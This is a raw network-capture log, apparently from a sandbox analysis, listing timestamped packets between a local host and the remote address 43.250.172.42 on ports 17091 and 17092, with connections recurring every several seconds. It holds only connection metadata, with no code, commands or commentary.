                                                              Dec 22, 2024 09:45:58.061476946 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.061537981 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.367074013 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.367150068 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.367357969 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.367360115 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.367420912 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.367477894 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.367525101 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.367568970 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.367599964 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.367614031 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.367666960 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.367711067 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.367755890 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.367784023 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.367806911 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.367819071 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.367856026 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.367898941 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.367899895 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.367942095 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.367961884 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.367996931 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.368053913 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.368129969 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.368149996 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.368187904 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.368206978 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.368233919 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.368277073 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.368299961 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.368330956 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.368375063 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.368416071 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.368431091 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.368458986 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.368482113 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.368513107 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.368539095 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.368557930 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.368608952 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.368663073 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.368710995 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.368753910 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.368767977 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.368794918 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.368819952 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.368850946 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.368894100 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.368901014 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.368937016 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.368963957 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.368985891 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.369029999 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.369071960 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.369107962 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.369113922 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.369159937 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.369174004 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.369246960 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.369281054 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.369299889 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.369357109 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.369400024 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.369434118 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.369442940 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.369487047 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.369537115 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.369580030 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.369623899 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.369632959 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.369688988 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.369792938 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.411788940 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.417284966 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.417494059 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.417558908 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.417634010 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.417685986 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.417714119 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.417756081 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.417821884 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.417870998 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.418019056 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.418077946 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.725394964 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.725467920 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.725517988 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.725605965 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.725661993 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.725677013 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.725708008 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.725750923 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.725769997 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.725805998 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.725883961 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.725950956 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.726005077 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.726008892 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.726049900 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.726092100 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.726145983 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.726146936 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.726191044 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.726258039 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.726286888 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.726315975 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.726358891 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.726402044 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.726447105 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.726468086 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.726497889 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.726541042 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.726583958 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.726598024 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.726634026 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.726650000 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.726684093 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.726725101 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.726741076 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.726768017 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.726808071 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.726821899 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.726867914 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.726910114 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.726926088 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.726975918 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.726988077 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.727046967 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.727089882 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.727113962 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.727139950 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.727194071 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.727237940 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.727251053 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.727281094 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.727296114 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.727334976 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.727380037 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.727422953 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.727468967 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.727469921 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.727521896 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.727565050 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.727576017 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.727607965 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.727660894 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.727708101 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.727729082 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.727750063 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.727792025 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.727844954 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.727875948 CET170914976743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:45:58.727899075 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.727967024 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:58.728034973 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:45:59.771431923 CET4976817091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:46:00.121886015 CET170914976843.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:46:00.122124910 CET4976817091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:46:01.754817963 CET4976717091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:46:05.756439924 CET4976817091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:46:05.756463051 CET4976817091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:46:06.107017040 CET170914976843.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:46:06.107036114 CET170914976843.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:46:06.108910084 CET170914976843.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:46:06.109307051 CET4976817091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:46:06.507237911 CET170914976843.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:46:15.751786947 CET4976817091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:46:16.102313995 CET170914976843.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:46:16.131798029 CET4976817091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:46:16.532172918 CET170914976843.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:46:31.388889074 CET4976817091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:46:31.739542007 CET170914976843.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:46:31.779959917 CET4976817091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:46:32.180681944 CET170914976843.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:46:47.010351896 CET4976817091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:46:47.360742092 CET170914976843.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:46:47.396363020 CET4976817091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:46:47.796436071 CET170914976843.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:47:02.631927013 CET4976817091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:47:02.982666016 CET170914976843.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:47:03.012310028 CET4976817091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:47:03.411230087 CET170914976843.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:47:18.253447056 CET4976817091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:47:18.603971958 CET170914976843.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:47:18.623759985 CET4976817091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:47:19.021989107 CET170914976843.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:47:33.875037909 CET4976817091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:47:33.875037909 CET4976817091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:47:35.812248945 CET4976917092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:47:36.170838118 CET170924976943.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:47:36.171066999 CET4976917092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:47:40.789625883 CET4976917092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:47:40.789707899 CET4976917092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:47:41.148643017 CET170924976943.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:47:41.148699045 CET170924976943.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:47:41.149523973 CET170924976943.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:47:41.149864912 CET4976917092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:47:41.558382034 CET170924976943.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:47:51.792932987 CET4976917092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:47:51.792932987 CET4976917092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:47:53.730113029 CET4977017091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:47:54.084825039 CET170914977043.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:47:54.085098982 CET4977017091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:47:58.671295881 CET4977017091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:47:58.671365976 CET4977017091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:47:59.026293993 CET170914977043.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:47:59.026576042 CET170914977043.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:47:59.028422117 CET170914977043.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:47:59.028815985 CET4977017091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:47:59.437622070 CET170914977043.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:48:09.742072105 CET4977017091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:48:09.742072105 CET4977017091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:48:11.679274082 CET4977117092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:48:12.024852991 CET170924977143.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:48:12.025043964 CET4977117092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:48:16.792347908 CET4977117092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:48:16.792381048 CET4977117092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:48:17.138076067 CET170924977143.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:48:17.138118982 CET170924977143.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:48:17.139239073 CET170924977143.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:48:17.139554024 CET4977117092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:48:17.534446001 CET170924977143.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:48:27.644356966 CET4977117092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:48:27.644356966 CET4977117092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:48:27.989845991 CET170924977143.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:48:27.990104914 CET4977117092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:48:29.581614971 CET4977217091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:48:29.938549042 CET170914977243.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:48:29.938741922 CET4977217091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:48:34.529391050 CET4977217091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:48:34.529458046 CET4977217091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:48:34.887073040 CET170914977243.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:48:34.887243986 CET170914977243.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:48:34.888761044 CET170914977243.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:48:34.889169931 CET4977217091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:48:35.296149015 CET170914977243.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:48:45.562253952 CET4977217091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:48:45.562321901 CET4977217091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:48:47.500271082 CET4977317092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:48:47.855571985 CET170924977343.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:48:47.855765104 CET4977317092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:48:52.568331003 CET4977317092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:48:52.568356991 CET4977317092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:48:52.923787117 CET170924977343.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:48:52.923794985 CET170924977343.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:48:52.925486088 CET170924977343.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:48:52.925872087 CET4977317092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:48:53.333812952 CET170924977343.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:49:03.495780945 CET4977317092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:49:03.495780945 CET4977317092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:49:05.433020115 CET4977417091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:49:05.778680086 CET170914977443.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:49:05.779723883 CET4977417091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:49:10.397615910 CET4977417091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:49:10.743506908 CET170914977443.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:49:10.743598938 CET170914977443.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:49:10.745600939 CET170914977443.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:49:10.745908022 CET4977417091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:49:11.141287088 CET170914977443.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:49:21.398094893 CET4977417091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:49:21.398094893 CET4977417091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:49:23.335314989 CET4977517092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:49:23.694024086 CET170924977543.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:49:23.694202900 CET4977517092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:49:28.393899918 CET4977517092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:49:28.746895075 CET170924977543.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:49:28.746911049 CET170924977543.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:49:28.747921944 CET170924977543.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:49:28.748301029 CET4977517092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:49:29.151313066 CET170924977543.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:49:39.347214937 CET4977517092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:49:39.347214937 CET4977517092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:49:39.700275898 CET170924977543.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:49:39.700504065 CET4977517092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:49:41.284480095 CET4977617091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:49:41.632482052 CET170914977643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:49:41.632731915 CET4977617091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:49:46.223598957 CET4977617091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:49:46.223664999 CET4977617091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:49:46.572029114 CET170914977643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:49:46.572069883 CET170914977643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:49:46.573913097 CET170914977643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:49:46.574213028 CET4977617091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:49:46.972503901 CET170914977643.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:49:57.296452999 CET4977617091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:49:57.296452999 CET4977617091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:49:59.233616114 CET4977717092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:49:59.588196993 CET170924977743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:49:59.588434935 CET4977717092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:50:04.157102108 CET4977717092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:50:04.157155037 CET4977717092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:50:04.511820078 CET170924977743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:50:04.511935949 CET170924977743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:50:04.513498068 CET170924977743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:50:04.513813019 CET4977717092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:50:04.917769909 CET170924977743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:50:15.229908943 CET4977717092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:50:15.229969025 CET4977717092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:50:15.584621906 CET170924977743.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:50:15.584800959 CET4977717092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:50:17.167221069 CET4977817091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:50:17.512598991 CET170914977843.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:50:17.512773991 CET4977817091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:50:22.127652884 CET4977817091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:50:22.127707958 CET4977817091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:50:22.472965002 CET170914977843.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:50:22.473165989 CET170914977843.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:50:22.474664927 CET170914977843.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:50:22.475075960 CET4977817091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:50:22.869812012 CET170914977843.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:50:33.132249117 CET4977817091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:50:33.477499008 CET170914977843.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:50:33.504616022 CET4977817091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:50:33.899404049 CET170914977843.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:50:48.753748894 CET4977817091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:50:48.753765106 CET4977817091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:50:49.099169970 CET170914977843.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:50:49.099339008 CET4977817091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:50:50.690967083 CET4977917092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:50:51.049465895 CET170924977943.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:50:51.049721956 CET4977917092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:50:55.830282927 CET4977917092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:50:55.830364943 CET4977917092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:50:56.188982010 CET170924977943.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:50:56.189224005 CET170924977943.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:50:56.190084934 CET170924977943.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:50:56.190387011 CET4977917092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:50:56.605220079 CET170924977943.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:51:06.671756983 CET4977917092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:51:06.671756983 CET4977917092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:51:07.030369043 CET170924977943.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:51:07.030527115 CET4977917092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:51:08.609033108 CET4978017091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:51:08.961968899 CET170914978043.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:51:08.962116003 CET4978017091192.168.11.2043.250.172.42
